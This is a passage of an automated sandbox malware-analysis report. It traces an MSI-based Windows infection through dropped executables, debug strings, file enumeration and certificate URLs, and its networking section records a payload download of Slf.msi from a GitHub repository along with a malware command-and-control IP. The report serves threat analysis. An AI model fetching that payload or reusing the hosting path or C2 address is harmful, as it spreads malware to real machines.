                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\epfw\winnt32\eguiEpfw.pdbd1J source: EHttpSrv.exe, 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000000F.00000002.2442351664.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 00000018.00000002.2781571152.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000001D.00000002.2886495130.0000000020483000.00000002.00000001.01000000.00000007.sdmp, http_dll.dll.3.dr
                      Source: Binary string: wntdll.pdbUGP source: EHttpSrv.exe, 00000006.00000002.2335103894.0000000002489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390158763.0000000004EC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390431920.0000000005330000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2442018605.0000000002461000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755121582.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755743248.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755650808.00000000021DE000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755930369.0000000002650000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781243411.0000000002416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833515028.00000000047CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833756998.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886143082.00000000024D9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107403303.0000000004854000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107631545.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108699557.0000000002112000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3109126752.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: MFC80U.i386.pdb source: EHttpSrv.exe, 00000006.00000002.2336798815.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000000F.00000002.2442489218.000000006C541000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 00000018.00000002.2781699116.000000006C951000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000001D.00000002.2886647949.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, mfc80u.dll.3.dr
                      Source: Binary string: wntdll.pdb source: EHttpSrv.exe, 00000006.00000002.2335103894.0000000002489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390158763.0000000004EC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390431920.0000000005330000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2442018605.0000000002461000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755121582.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755743248.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755650808.00000000021DE000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755930369.0000000002650000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781243411.0000000002416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833515028.00000000047CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833756998.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886143082.00000000024D9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107403303.0000000004854000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107631545.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108699557.0000000002112000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3109126752.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\epfw\winnt32\eguiEpfw.pdb source: EHttpSrv.exe, 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000000F.00000002.2442351664.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 00000018.00000002.2781571152.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000001D.00000002.2886495130.0000000020483000.00000002.00000001.01000000.00000007.sdmp, http_dll.dll.3.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr
                      Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeFile opened: c:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,7_2_00405768
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_004026FE FindFirstFileA,7_2_004026FE
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_004062A3 FindFirstFileA,FindClose,7_2_004062A3
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 4x nop then mov word ptr [ebp+edx*2+00h], si6_2_20404160
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 4x nop then xor dword ptr [edi+eax], ebp6_2_20403A70
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 4x nop then mov word ptr [ebp+edx*2+00h], si15_2_20404160
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 4x nop then xor dword ptr [edi+eax], ebp15_2_20403A70

                      Networking

                      barindex
                      Source: Malware configuration extractorIPs: 185.157.162.126
                      Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                      Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                      Source: Joe Sandbox ViewIP Address: 20.233.83.145 20.233.83.145
                      Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /Kroby5444/Jim/raw/refs/heads/main/Slf.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: github.com
                      Source: global trafficHTTP traffic detected: GET /Kroby5444/Jim/refs/heads/main/Slf.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: raw.githubusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: github.com
                      Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                      Source: EHttpSrv.exe, 00000006.00000002.2336798815.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000000F.00000002.2442489218.000000006C541000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 00000018.00000002.2781699116.000000006C951000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000001D.00000002.2886647949.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, mfc80u.dll.3.drString found in binary or memory: ftp://http://HTTP/1.0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: Updwork.exe, Updwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, Updwork.exe, 00000007.00000000.2277511734.000000000040A000.00000008.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588293176.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Updwork.exe.3.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
                      Source: Updwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, Updwork.exe, 00000007.00000000.2277511734.000000000040A000.00000008.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588293176.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Updwork.exe.3.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
